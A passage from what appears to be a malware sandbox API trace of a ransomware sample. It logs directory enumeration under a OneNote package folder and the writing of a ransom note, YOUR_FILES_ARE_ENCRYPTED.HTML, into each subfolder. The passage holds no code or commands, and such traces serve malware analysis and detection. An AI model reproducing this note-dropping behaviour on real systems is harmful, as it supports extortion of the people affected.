ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.834] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 1 [0116.834] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 0 [0116.834] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.834] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.834] GetProcessHeap () returned 0x600000 [0116.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.835] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.836] CloseHandle (hObject=0x32c) returned 1 [0116.836] GetProcessHeap () returned 0x600000 [0116.836] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.836] GetProcessHeap () returned 0x600000 [0116.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.837] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.837] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.837] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies") returned 102 [0116.837] GetProcessHeap () returned 0x600000 [0116.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.837] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies" [0116.837] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.837] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.837] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 1 [0116.837] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 0 [0116.837] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.837] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0116.837] GetProcessHeap () returned 0x600000 [0116.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.838] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.838] CloseHandle (hObject=0x32c) returned 1 [0116.839] GetProcessHeap () returned 0x600000 [0116.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.839] GetProcessHeap () returned 0x600000 [0116.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.839] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.839] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.839] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory") returned 102 [0116.839] GetProcessHeap () returned 0x600000 [0116.839] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.839] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory" [0116.839] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.839] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 1 [0116.839] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 0 [0116.839] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.839] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0116.839] GetProcessHeap () returned 0x600000 [0116.839] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.840] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.841] CloseHandle (hObject=0x32c) returned 1 [0116.841] GetProcessHeap () returned 0x600000 [0116.841] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.841] GetProcessHeap () returned 0x600000 [0116.841] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.841] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.841] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.841] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp") returned 95 [0116.841] GetProcessHeap () returned 0x600000 [0116.841] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.841] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp" [0116.841] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.845] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 1 [0116.845] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d340, cFileName="..", cAlternateFileName="")) returned 0 [0116.845] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.845] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.845] GetProcessHeap () returned 0x600000 [0116.845] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.846] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.847] CloseHandle (hObject=0x214) returned 1 [0116.847] GetProcessHeap () returned 0x600000 [0116.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.847] GetProcessHeap () returned 0x600000 [0116.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.848] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64bd6a07, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64bd6a07, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.848] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.848] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0116.848] GetProcessHeap () returned 0x600000 [0116.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.849] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.850] CloseHandle (hObject=0x320) returned 1 [0116.850] GetProcessHeap () returned 0x600000 [0116.850] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.850] GetProcessHeap () returned 0x600000 [0116.850] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.851] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b6436c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b6436c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.851] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.851] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData") returned 95 [0116.851] GetProcessHeap () returned 0x600000 [0116.851] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.851] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData" [0116.851] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData\\*" [0116.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b6436c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b6436c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0116.852] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b6436c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b6436c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.852] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b6436c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b6436c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 0 [0116.852] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0116.852] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.852] GetProcessHeap () returned 0x600000 [0116.852] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 